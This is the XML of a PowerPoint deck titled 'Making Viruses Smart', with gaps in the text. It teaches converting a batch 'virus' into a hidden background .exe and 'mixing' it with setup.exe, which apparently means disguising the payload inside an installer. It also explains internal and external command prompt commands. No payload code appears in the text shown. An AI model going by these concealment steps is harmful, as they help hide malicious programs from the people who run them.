          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Making Viruses Smart</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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8738" y="1247136"/>
            <a:ext cx="2615998" cy="2511358"/>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44273" y="1478720"/>
            <a:ext cx="3820851" cy="2279774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198739366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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221129" y="841093"/>
            <a:ext cx="9392856" cy="4830502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Firstly copy all these coding into the notepad and name them anything with .bat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>extention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Now converts this  .bat file into .exe file with the help of Bat to Exe converter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>This is the software which </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>      helps us to hide the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>      coding and runs the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>      in background.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>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12449" y="1770928"/>
            <a:ext cx="4692654" cy="413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86959" y="3812893"/>
            <a:ext cx="1325900" cy="12289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37390" y="3837009"/>
            <a:ext cx="1159476" cy="1053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ight Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039284" y="4226108"/>
            <a:ext cx="614486" cy="40254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9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9195058" y="4212671"/>
            <a:ext cx="614486" cy="41597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2" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663478" y="5072642"/>
            <a:ext cx="907300" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>BAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10225582" y="5093025"/>
            <a:ext cx="1047082" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>EXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22156326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126121" y="1027737"/>
            <a:ext cx="3276600" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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ltLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Finishing Virus Coding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545221" y="2056436"/>
            <a:ext cx="8153400" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2764421" y="1904036"/>
            <a:ext cx="63246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fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1"/>
              <a:t>                           Mixing process.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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88346" y="2818436"/>
            <a:ext cx="4257675" cy="3267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3821" y="2970836"/>
            <a:ext cx="1006475"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7621" y="4723436"/>
            <a:ext cx="1150938"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Plus 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078621" y="4113836"/>
            <a:ext cx="457200" cy="381000"/>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1" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3145421" y="4190036"/>
            <a:ext cx="533400" cy="228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2" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8098421" y="4266236"/>
            <a:ext cx="533400" cy="228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13"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84221" y="3885236"/>
            <a:ext cx="1049338"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Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916821" y="3199436"/>
            <a:ext cx="6096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fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>.bat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916821" y="4963149"/>
            <a:ext cx="69056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fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8708021" y="5115549"/>
            <a:ext cx="12954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onstantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Constantia" panose="02030602050306030303" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>setup.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 1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57714" y="833356"/>
            <a:ext cx="2835827" cy="1985079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155150223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47099" y="664879"/>
            <a:ext cx="5116010" cy="5550726"/>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7029" y="976011"/>
            <a:ext cx="1762125" cy="1762125"/>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13233" y="4409954"/>
            <a:ext cx="2318120" cy="2108040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3058477" y="2966542"/>
            <a:ext cx="1266693" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" dirty="0" smtClean="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278690976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365280" y="3533172"/>
            <a:ext cx="4046685" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank You!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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8669" y="1866297"/>
            <a:ext cx="4762500" cy="3333750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365280" y="2133164"/>
            <a:ext cx="4603504" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep Coding….</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382745034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4312703" y="2677175"/>
            <a:ext cx="3623108" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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31144" y="1984860"/>
            <a:ext cx="1481559" cy="1707978"/>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01401" y="1984860"/>
            <a:ext cx="1981200" cy="1885950"/>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14657" y="1984860"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127194855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a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>ypes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2300" dirty="0"/>
              <a:t>that we can run from a command prompt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>commands are nothing but the built-in commands that are shipped along with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the operating system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>example, echo, cls, del, dir were few of the well known internal commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6180671" y="3243262"/>
            <a:ext cx="4718304" cy="2836904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>External commands are the commands that are often created while installing a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>application and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>these commands mostly have no use except calling that application and support files. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Few external commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>can only be executed in the ‘Run’ dialog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>box, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>but not on the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
